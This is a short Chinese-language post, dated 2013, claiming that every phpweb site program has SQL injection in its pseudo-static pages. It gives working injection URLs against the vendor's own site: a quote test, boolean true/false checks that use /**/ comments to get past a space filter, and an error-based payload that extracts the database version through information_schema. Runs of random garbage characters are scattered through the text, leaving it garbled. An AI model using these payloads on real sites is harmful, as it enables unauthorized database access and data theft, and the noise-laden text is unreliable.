phpweb所有的整站程序伪静态页面都存在sql注入4 R8 K8 X6 }7 Q0 p, j
6 Q- D1 a0 E$ t$ T O: S) k主站:http://phpweb.net/2 B- m7 s4 i- m8 w' t" h9 g7 {
加’检测:7 N# A8 U, ^& k5 T9 j1 k
- l5 ^. l4 f3 m, g whttp://www.phpweb.net/down/html/?772′.html: b: t9 N7 A, [/ m7 ]2 ?) [# R% s% @* w5 O
. ]. I# W J2 o" X |8 |出错+ X- Y, V" ^4 Q l3 X) Z
存在注入。( s& r( e9 _; a
不能用空格,只能用/*罗+ d' j! J% D B" c- @ o+ |
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
) d/ A- l- x- q. \& }; e+ k * T8 D* H4 X9 G7 A, B
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.! j8 u8 Q- A* x" a0 A
爆数据库版本:
, |" D% z( k U# K* D6 Z7 K: K
+ [7 }6 M G: N$ L; _- l2 n3 t7 i?5 _9 k3 Z& R: w5 p- i; v
1
5 ^* u, n1 J' h. k$ F% G* F; Jhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html. S$ x: y) \9 c6 E
更新日期: 2013-01-03 13:39:50 % i7 c4 B7 B, l- L; h
|